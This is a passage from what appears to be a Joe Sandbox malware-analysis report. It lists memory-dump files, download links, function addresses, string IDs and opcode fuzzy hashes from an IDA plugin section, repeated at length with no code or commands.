                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Inf$NaN
                                                                        • API String ID: 0-3500518849
                                                                        • Opcode ID: b0e2b2875c401f6cab5722d72336aca424ee80348b0bee9137c99bdb03c7602b
                                                                        • Instruction ID: ebdaf4abdd15f1219e941cac76d0cd29eb7dbfa562fe70c48dc77aca2521a570
                                                                        • Opcode Fuzzy Hash: b0e2b2875c401f6cab5722d72336aca424ee80348b0bee9137c99bdb03c7602b
                                                                        • Instruction Fuzzy Hash: 6ED1D571A083119BC708CF28C98165BBBEAEFC4751F158A2DF899973D0E771DD458B82
                                                                        Function 00642700 Relevance: 2.8, Strings: 2, Instructions: 347COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: %*+($%*+(
                                                                        • API String ID: 2994545307-3039692684
                                                                        • Opcode ID: a34962b7977193f097f64f6b72c9583fed7c9de0abc4947e0554f8cd6225df13
                                                                        • Instruction ID: 4438868c273680b8213a1ef92dcdb67b54f07c5f9ac2d6ab324317b8a497e57f
                                                                        • Opcode Fuzzy Hash: a34962b7977193f097f64f6b72c9583fed7c9de0abc4947e0554f8cd6225df13
                                                                        • Instruction Fuzzy Hash: 86A106716083129BE738CB25CC91BABB7D3EF88314FA4893DF995D7391EA3099418752
                                                                        Function 00629328 Relevance: 2.8, Strings: 2, Instructions: 339COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 5L$_]
                                                                        • API String ID: 0-2033130362
                                                                        • Opcode ID: 18848e014c414f46339eae7cae47e777007bf235a82af264badc863ec1404d96
                                                                        • Instruction ID: 2ea3a38f58f8cc543eeeba8924460e62512f3075050124aba70d410ff7b6009a
                                                                        • Opcode Fuzzy Hash: 18848e014c414f46339eae7cae47e777007bf235a82af264badc863ec1404d96
                                                                        • Instruction Fuzzy Hash: 6AB1E176A18B22CBC324DF28D4901AAB3F3FFD4750F19892CD4855B754E7359906CBA1
                                                                        Function 006014A8 Relevance: 2.8, Strings: 2, Instructions: 281COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0123456789ABCDEFXP$0123456789abcdefxp
                                                                        • API String ID: 0-595753566
                                                                        • Opcode ID: 633ecbb3686795a77f77e7aa77a7e6b32be11f1b384751494c357ddb23636c53
                                                                        • Instruction ID: e674778e90e03255b0226350a42ade489ae1b5e8f1fd1a733c8e71bb75663a99
                                                                        • Opcode Fuzzy Hash: 633ecbb3686795a77f77e7aa77a7e6b32be11f1b384751494c357ddb23636c53
                                                                        • Instruction Fuzzy Hash: 7AA19D31A4C3828BD71CCE24C0A83ABBBE2AF96304F14896DE4D55B3D1D7759D49CB82
                                                                        Function 00609FF5 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0$8
                                                                        • API String ID: 0-46163386
                                                                        • Opcode ID: f4d6ea1ab6121c494833b15fa3a62cdebf035ae0e5cfa88c28159ab1c560c224
                                                                        • Instruction ID: 4252c90efacc9501d7e84ae7239f9a81e7dee1d9fb1fea12c20877d8d3d972ed
                                                                        • Opcode Fuzzy Hash: f4d6ea1ab6121c494833b15fa3a62cdebf035ae0e5cfa88c28159ab1c560c224
                                                                        • Instruction Fuzzy Hash: E0C14635209380EFD7158F68C840B9FBBE2BF89354F04891DF988972A2C375D958DB62
                                                                        Function 006114CE Relevance: 2.8, Strings: 2, Instructions: 257COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
